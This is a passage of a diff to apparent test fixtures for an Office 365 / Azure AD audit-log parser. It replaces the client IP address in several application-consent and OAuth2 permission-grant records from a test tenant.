application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -13250,9 +13250,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:30:06", "ExtendedProperties": [ { @@ -13487,7 +13487,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3393756Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118027\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"0031778a-80cf-49f8-aea2-f798c9bf1ec9\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3393756Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118027\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"0031778a-80cf-49f8-aea2-f798c9bf1ec9\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -13517,9 +13517,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:30:06", "ExtendedProperties": [ { @@ -13754,7 +13754,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -13784,9 +13784,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:30:06", "ExtendedProperties": [ { @@ -14020,7 +14020,7 @@ }, { "event": { - "original": 